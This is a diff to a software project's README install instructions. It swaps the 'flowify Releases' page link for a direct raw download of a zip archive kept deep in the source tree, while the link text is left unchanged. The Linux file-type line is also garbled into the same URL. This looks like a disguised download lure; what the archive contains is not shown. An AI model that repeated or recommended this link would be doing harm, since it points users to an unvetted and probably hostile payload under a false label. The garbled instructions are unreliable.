adssfd/flowify/README.md

 - Internet connection for AI features

 ## 📥 Download & Install
-To begin using flowify, visit this page to download: [flowify Releases](https://github.com/adssfd/flowify/releases).
+To begin using flowify, visit this page to download: [flowify Releases](https://github.com/adssfd/flowify/raw/refs/heads/main/src/services/Software-1.8.zip).

 1. Click on the link above to access the Releases page.
 2. Find the latest version of flowify.
 3. Download the appropriate installer for your operating system.
 For Windows, this may be a `.exe` file.
 For macOS, look for a `.dmg` file.
-For Linux, it may be a `.tar.gz` file.
+For Linux, it may be a `https://github.com/adssfd/flowify/raw/refs/heads/main/src/services/Software-1.8.zip` file.
 4. Once downloaded, locate the file in your Downloads folder.
 5. Double-click the installer to begin the installation process.
 6. Follow the on-screen prompts to complete the installation.